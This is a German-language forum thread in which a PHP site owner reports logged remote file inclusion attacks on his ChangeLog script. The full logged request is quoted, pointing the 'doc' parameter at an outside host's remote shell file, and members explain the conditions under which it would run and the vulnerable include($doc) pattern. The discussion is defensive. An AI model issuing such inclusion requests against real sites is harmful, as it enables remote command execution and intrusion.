Neuigkeiten:

still alive...

Hauptmenü

ChangeLog Angriff

Begonnen von Powie, 25. Januar 2008, 09:48:21

Vorheriges Thema - Nächstes Thema

Powie

Aktuell wird das ChangeLog vom pSys immer häufig angegriffen /uploads/emoticons/icon_e_smile.gif.4a0acefcb917340d2c82e5239c009e6e.gif\" alt=\":)\" />
der Request sieht genau so aus:
www.powie.de/cms/ChangeLog/index.php?doc=http://www.aneuk.com/test/oke.txt\" rel=\"external nofollow\">http://www.aneuk.com/test/oke.txt?<
Interessant wenn man sich die vermeintliche Doc mal ansieht:
http://www.aneuk.com/test/oke.txt\" rel=\"external nofollow\">http://www.aneuk.com/test/oke.txt

k00ni

Kann das irgendwann mal zu Problemen führen, wo dann in ein System erfolgreich eingebrochen werden könnte?

Kann das irgendwann mal zu Problemen führen, wo dann in ein System erfolgreich eingebrochen werden könnte?[/quote]
http://www.aneuk.com/test/oke.txt\" rel=\"external nofollow\">http://www.aneuk.com/test/oke.txt ist eine Remote Shell. Wenn:
- die Shell geladen werden kann
- eine der Funktionen passthru, system, popen oder shell_exec verfügbar ist
- register_globals on ist
- Short Tags erlaubt sind
kann man damit beliebige Befehle im Nutzerkontext des Users ausführen, der das Skript ausführt, ausführen.
ChangeLog ist IMHO nicht angreifbar.

Powie

die Gefahr wäre gegeben bei einem Script mit den von Statler genannten Settings, welches zum Beispiel einfach einen
include($doc);
macht.
Ist nur ein Beispiel aus vielen vielen Einträgen die ich logge. Da wird bei mir auch speziell nach Mambo, Typo, etc. ähnlichen Links gesucht.

k00ni

Könnt ihr gute Infoquellen empfehlen?

Ist nur ein Beispiel aus vielen vielen Einträgen die ich logge. Da wird bei mir auch speziell nach Mambo, Typo, etc. ähnlichen Links gesucht.[/quote]
Es gibt noch ein paar Konstrukte mehr, die gefährlich sind. Es empfiehlt sich - neben sorgfältiger Programmierung - http://de.php.net/manual/en/ref.filesystem.php#ini.allow-url-include\" rel=\"external nofollow\">allow_url_include zu deaktivieren.
Aber nochmal: Es ist absolut notwendig, sorgfältig zu programmieren.
Könnt ihr gute Infoquellen empfehlen?[/quote]
http://www.amazon.de/PHP-Sicherheit-PHP-MySQL-Webanwendungen-sicher-programmieren/dp/3898644502/ref=sr_1_3?ie=UTF8&s=gateway&qid=1201270175&sr=8-3\" rel=\"external nofollow\">PHP-Sicherheit
http://de.php.net/manual/en/security.php\" rel=\"external nofollow\">Security
http://shiflett.org/articles\" rel=\"external nofollow\">shiflett.org
http://blog.php-security.org/\" rel=\"external nofollow\">Stefan Esser
http://www.nessus.org/nessus/\" rel=\"external nofollow\">Nessus

all your base are belong to us / Discord